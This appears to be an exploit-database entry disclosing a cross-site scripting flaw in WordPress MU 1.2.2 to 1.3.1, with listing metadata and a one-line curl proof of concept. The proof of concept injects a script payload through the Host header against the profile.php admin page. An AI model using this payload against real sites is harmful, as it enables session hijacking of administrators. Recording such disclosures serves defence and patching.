WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting

Author: Juan Galiana Lara
type: webapps
platform: php
port: 
date_added: 2009-11-09  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10090.txt  
An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following proof of concept is available:

curl -H "Cookie: my cookies here" -H "Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html